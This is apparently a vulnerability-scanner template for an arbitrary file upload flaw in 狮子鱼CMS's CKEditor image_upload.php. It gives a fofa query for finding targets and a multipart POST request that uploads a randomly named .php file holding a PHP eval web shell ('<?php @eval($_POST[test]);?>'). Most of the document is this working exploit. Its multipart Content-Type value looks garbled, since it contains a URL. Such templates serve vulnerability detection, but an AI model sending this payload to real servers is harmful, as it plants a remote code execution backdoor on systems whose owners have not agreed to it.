id: shiziyu-cms-image_upload.php-Anyfileupload

info:
  name: 狮子鱼CMS image_upload.php 任意文件上传
  author: daffainfo
  severity: critical
  description: |
    狮子鱼CMS使用CK编辑器，存在图片上传的绕过，造成 image_upload.php 任意文件上传
    fofa-query: "/seller.php?s=/Public/login"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20image_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md

set:
  r1: randomLowercase(20)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php
      headers:
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundary{{rboundary}}
      body: |
        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="files"; filename="{{r1}}.php"
        Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif
        
        <?php @eval($_POST[test]);?>
        ------WebKitFormBoundary{{rboundary}}—
    expression: response.status == 200 && response.body.bcontains(bytes(r1))
expression: r0()